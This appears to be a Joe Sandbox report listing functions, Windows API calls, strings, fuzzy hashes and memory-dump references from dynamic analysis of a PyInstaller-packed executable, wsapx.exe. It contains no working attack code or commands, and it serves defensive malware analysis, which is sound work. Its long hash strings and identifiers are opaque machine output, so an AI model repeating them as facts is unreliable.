Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction ID: 999e80c2de1e550b40157e95cc51e93f567e9002ce35832dfb1a1cba2b8f026e
Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction Fuzzy Hash: 92112B32618B8183EB619F15F440269B7E4FB88F94F994234DE8D07B69EF3CD5528B00

Function 00007FF7C71D07AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D07DC
GetDriveTypeW.KERNEL32 ref: 00007FF7C71D081C

Strings

:, xrefs: 00007FF7C71D0805

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction ID: ba3a1ff7511b0b4414d425eb6ff46139613af58c264950ad48d73016b97ccb97
Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction Fuzzy Hash: 1701882291C20787F721BF50B4A627EA7A0EFD4B64FC00035D55D46695DF2CD5068E34

Analysis Process: wsapx.exePID: 7432, Parent PID: 7372COMMON

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.2%
Total number of Nodes:	811
Total number of Limit Nodes:	49

Executed Functions

Function 00007FF7C71B1000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF7C71B3971
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF7C71B3A0B, 00007FF7C71B3CD4, 00007FF7C71B3F6B
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF7C71B3B32
Py_GIL_DISABLED, xrefs: 00007FF7C71B3AF4
pkg, xrefs: 00007FF7C71B39BE
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF7C71B39DE
MEI, xrefs: 00007FF7C71B3933
Could not create temporary directory!, xrefs: 00007FF7C71B3CBF
_PYI_SPLASH_IPC, xrefs: 00007FF7C71B3A23, 00007FF7C71B3EF5
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF7C71B3BE8
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF7C71B3C61
_PYI_ARCHIVE_FILE, xrefs: 00007FF7C71B38D2, 00007FF7C71B39FF
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF7C71B3EA6
Failed to load splash screen resources!, xrefs: 00007FF7C71B3E85
pyi-python-flag, xrefs: 00007FF7C71B3AD6
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF7C71B3D35
Failed to start splash screen!, xrefs: 00007FF7C71B3ED4
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF7C71B3E0A
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF7C71B3D12
VCRUNTIME140.dll, xrefs: 00007FF7C71B3DB1
Failed to remove temporary directory: %s, xrefs: 00007FF7C71B3FC3
pyi-disable-windowed-traceback, xrefs: 00007FF7C71B3BB2
pyi-contents-directory, xrefs: 00007FF7C71B3B8D
bye-runtime-tmpdir, xrefs: 00007FF7C71B3B68
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF7C71B3882, 00007FF7C71B38AF
Failed to convert DLL search path!, xrefs: 00007FF7C71B3DDC
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF7C71B3EBB
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF7C71B3A17, 00007FF7C71B3A2F, 00007FF7C71B3A9B

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: c0a66ebca772141f760a29a0dd77fc68e5502f7a94feb123d2d63e937376cc0c
Instruction ID: 8a0433d2a297f1ae2080a340be932a6bcead0bd754eeb409eb830f4b06b84214
Opcode Fuzzy Hash: c0a66ebca772141f760a29a0dd77fc68e5502f7a94feb123d2d63e937376cc0c
Instruction Fuzzy Hash: FC329FA1A0868293FB25BF25B4552B9E651EFD4FA0FC44432DE5D432C6DF2CE56AC320

Function 00007FF7C71D69D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7C71D6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D6749
Part of subcall function 00007FF7C71D6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D67C7
Part of subcall function 00007FF7C71D6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D6818

CreateFileW.KERNEL32 ref: 00007FF7C71D6ADA
CreateFileW.KERNEL32 ref: 00007FF7C71D6B2A
GetLastError.KERNEL32 ref: 00007FF7C71D6B5A
GetFileType.KERNEL32 ref: 00007FF7C71D6B6F
GetLastError.KERNEL32 ref: 00007FF7C71D6B79
CloseHandle.KERNEL32 ref: 00007FF7C71D6BAC
CloseHandle.KERNEL32 ref: 00007FF7C71D6D0F
CreateFileW.KERNEL32 ref: 00007FF7C71D6D44
GetLastError.KERNEL32 ref: 00007FF7C71D6D53

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: 8f976919f97738e0c6914738063a1009788b273b3c4705686e7d387d067904c9
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: 09C1D332B28A4186EB11EFA9E4902AC7771F799FA8B414225DE2E577D4CF38E512C710

Function 00007FFD94758290 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 522COMMON

Download Yara Rule

APIs

00007FFDAC0619C0.VCRUNTIME140 ref: 00007FFD947583DE

Strings

nolock, xrefs: 00007FFD947587B6
immutable, xrefs: 00007FFD947587ED
-journal, xrefs: 00007FFD94758637

Memory Dump Source

Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true

Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd

Similarity

API ID: 00007C0619
String ID: -journal$immutable$nolock
API String ID: 3344901894-4201244970
Opcode ID: 6d2302c2d273f82fd05ed0fcece98cc456367649c3faf61b02af63669267510c
Instruction ID: 1b661b4845b30a7ea58dc90bd7c12713d66ecfbd4025f0bfaafd68391e5aff4c
Opcode Fuzzy Hash: 6d2302c2d273f82fd05ed0fcece98cc456367649c3faf61b02af63669267510c
Instruction Fuzzy Hash: 2B32C122B09B86C6EB748FA594A03793791FF46B94F098234CA5E4B796DF3CE465C340

Function 00007FFD947C1850 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 369COMMON

Download Yara Rule

APIs

00007FFDAC0619C0.VCRUNTIME140 ref: 00007FFD947C18BF

Strings

statement too long, xrefs: 00007FFD947C1A76
out of memory, xrefs: 00007FFD947C192B
database schema is locked: %s, xrefs: 00007FFD947C1A16

Memory Dump Source

Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true

Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd

Similarity

API ID: 00007C0619
String ID: database schema is locked: %s$out of memory$statement too long
API String ID: 3344901894-1046679716
Opcode ID: 0debb23e3739cc449da5461e64965afd84d721c678890d73669033abb012c6c3
Instruction ID: 0ce8414dd05fb6f888f18bf2999d4f2ccc4d0ac207a82c4e75e59c2a274a3eb7
Opcode Fuzzy Hash: 0debb23e3739cc449da5461e64965afd84d721c678890d73669033abb012c6c3
Instruction Fuzzy Hash: CFF1B522B08789D6EB35DFA195A03BA77A1FB86B45F088135DA4D07796DF7CE440CB80

Function 00007FFD94491000 Relevance: 6.9, APIs: 4, Instructions: 900librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFD94491B29
GetProcAddress.KERNEL32 ref: 00007FFD94491B53
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FFD94491BDD
VirtualProtect.KERNEL32 ref: 00007FFD94491BFB

Memory Dump Source

Source File: 00000002.00000002.2668687282.00007FFD94491000.00000080.00000001.01000000.00000004.sdmp, Offset: 00007FFD93DD0000, based on PE: true

Associated: 00000002.00000002.2667709353.00007FFD93DD0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2667746115.00007FFD93DD1000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2667746115.00007FFD9407F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2667746115.00007FFD9408C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2667746115.00007FFD94102000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2667746115.00007FFD941CD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2667746115.00007FFD941D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2667746115.00007FFD942CE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2667746115.00007FFD942D2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2667746115.00007FFD943CB000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2667746115.00007FFD943D6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2667746115.00007FFD9444F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2667746115.00007FFD94484000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.2668723386.00007FFD94492000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd93dd0000_wsapx.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: bf3875d787bfcc14ef9ed9645fa2fd386f6a2c0859c7a2bae9dc7dced8cafdbb
Instruction ID: 1f81d822a675cb5044e290471aee54219c241c0ccabe5a9e9365707d0e663e09
Opcode Fuzzy Hash: bf3875d787bfcc14ef9ed9645fa2fd386f6a2c0859c7a2bae9dc7dced8cafdbb
Instruction Fuzzy Hash: F362482271819287F7258F78D49027D77A0F749B85F049632EA9EC37C9EABCEA45D700

Function 00007FFD93D97B30 Relevance: 6.8, APIs: 4, Instructions: 850librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFD93D985F0
GetProcAddress.KERNEL32 ref: 00007FFD93D9861A
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FFD93D986A4
VirtualProtect.KERNEL32 ref: 00007FFD93D986C2

Memory Dump Source

Source File: 00000002.00000002.2667625699.00007FFD93D97000.00000080.00000001.01000000.0000000A.sdmp, Offset: 00007FFD938A0000, based on PE: true

Associated: 00000002.00000002.2666677120.00007FFD938A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2666718070.00007FFD938A1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2666718070.00007FFD938B2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2666718070.00007FFD938C2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2666718070.00007FFD938C8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2666718070.00007FFD93912000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2666718070.00007FFD93927000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2666718070.00007FFD93937000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2666718070.00007FFD9393E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2666718070.00007FFD9394C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2666718070.00007FFD93C09000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2666718070.00007FFD93C0B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2666718070.00007FFD93C42000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2666718070.00007FFD93C82000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2666718070.00007FFD93CDA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2666718070.00007FFD93D4A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2666718070.00007FFD93D7F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2666718070.00007FFD93D91000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2667660778.00007FFD93D99000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd938a0000_wsapx.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: fd6e17aede7dd1a07b4ecde7e4701136c40a3ad312db3d6b815d4e7960ab785a
Instruction ID: e1f985239833bb133dbdbba7197d736defe8346e04e0287169b65a8c924fc557
Opcode Fuzzy Hash: fd6e17aede7dd1a07b4ecde7e4701136c40a3ad312db3d6b815d4e7960ab785a
Instruction Fuzzy Hash: 6262272272959287E7698FB8D42037D77A4F758B85F046532EA9ED37C4EA3CEA44C700

Function 00007FFD94760A50 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 590COMMON

Download Yara Rule

APIs

00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD94760AB8

Strings

:memory:, xrefs: 00007FFD94760AAE

Memory Dump Source

Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true

Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd

Similarity

API ID: 00007B2245630
String ID: :memory:
API String ID: 1780217008-2920599690
Opcode ID: 91b0e484d977521e88cb554add3d4ba898cd67a262d1f5dc198e376bfc7720f5
Instruction ID: 3535b69469330495f43426b4abf69aeb148265463564471ebec4c89c7f982fa3
Opcode Fuzzy Hash: 91b0e484d977521e88cb554add3d4ba898cd67a262d1f5dc198e376bfc7720f5
Instruction Fuzzy Hash: 92429E22B09B8AC6EA74CFA594A437D37A5FB46B98F048135CA4D43796DF3CE494C381

Function 00007FF7C71B92F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00007FF7C71B9323
FindClose.KERNEL32 ref: 00007FF7C71B9332

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction ID: ee5f7b41a779f1b103c57a755e9006fa80703bf78b4dcbba2fcb032095924202
Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction Fuzzy Hash: 16F04472A18641C7F760AF64B49976AA750ABC4B74F844335D96D026D4DF3CD14E8A10

Function 00007FFD94750180 Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00007FFD947501A5

Memory Dump Source

Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true

Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: b0054afb10e4f66619171edf603becae74e7afe6d3d72f3cb96377bce576b712
Instruction ID: 18091f8134eaa008a6e21a898c5cafd8ef0d62ab441da5de5950513a62cfd6bd
Opcode Fuzzy Hash: b0054afb10e4f66619171edf603becae74e7afe6d3d72f3cb96377bce576b712
Instruction Fuzzy Hash: 53A1EC61B09F8BC5EE788BD5A5F42383795BF47B48F548539C90D0A7A2DF6CA492C280

Function 00007FF7C71B1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7C71B7F80: _fread_nolock.LIBCMT ref: 00007FF7C71B802A

_fread_nolock.LIBCMT ref: 00007FF7C71B1A1B

Part of subcall function 00007FF7C71B2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7C71B1B6A), ref: 00007FF7C71B295E

Strings

fseek, xrefs: 00007FF7C71B19F5
MEI, xrefs: 00007FF7C71B1991
fread, xrefs: 00007FF7C71B1A32, 00007FF7C71B1B5C
Failed to read cookie!, xrefs: 00007FF7C71B1A2B
Could not allocate memory for archive structure!, xrefs: 00007FF7C71B1A61
Could not read full TOC!, xrefs: 00007FF7C71B1B55
Error on file., xrefs: 00007FF7C71B1B8D
malloc, xrefs: 00007FF7C71B1B22
Failed to seek to cookie position!, xrefs: 00007FF7C71B19EE
Could not allocate buffer for TOC!, xrefs: 00007FF7C71B1B1B
calloc, xrefs: 00007FF7C71B1A68

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: abc02df14881b8553accab44fb79ef53eaa7c88a432e732f5ead529d710b0ae2
Instruction ID: d70cfc6195fc226bdad842685ad331c19464c239623485a34b7d0e1af4d7eff2
Opcode Fuzzy Hash: abc02df14881b8553accab44fb79ef53eaa7c88a432e732f5ead529d710b0ae2
Instruction Fuzzy Hash: E68184B1A0868687E721EF25F0812B9A3A0EFC4FA4F814435DD4E47785DE3CE6479B60

Function 00007FF7C71B1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fseek, xrefs: 00007FF7C71B14E5
fread, xrefs: 00007FF7C71B15E6
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7C71B14DE
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7C71B149F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7C71B15DF
malloc, xrefs: 00007FF7C71B151F
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7C71B1518

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 3899eae9b9cf556598d50536af751799a91292f9e5d7650659be9fe1a68b4b95
Instruction ID: b8c9533c1dff879ac79f854dec3860f975f53bc920527f97a2c7f245373c97bc
Opcode Fuzzy Hash: 3899eae9b9cf556598d50536af751799a91292f9e5d7650659be9fe1a68b4b95
Instruction Fuzzy Hash: 85419E61A0864287EA10EF66B4811B9E3A0BF85FF4FC44436ED5E47B95DE3CE5079B20

Function 00007FF7C71B1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF7C71B1276
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF7C71B141E
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF7C71B12BA
malloc, xrefs: 00007FF7C71B12C1, 00007FF7C71B12F6
1.3.1, xrefs: 00007FF7C71B1249
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF7C71B12EF

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

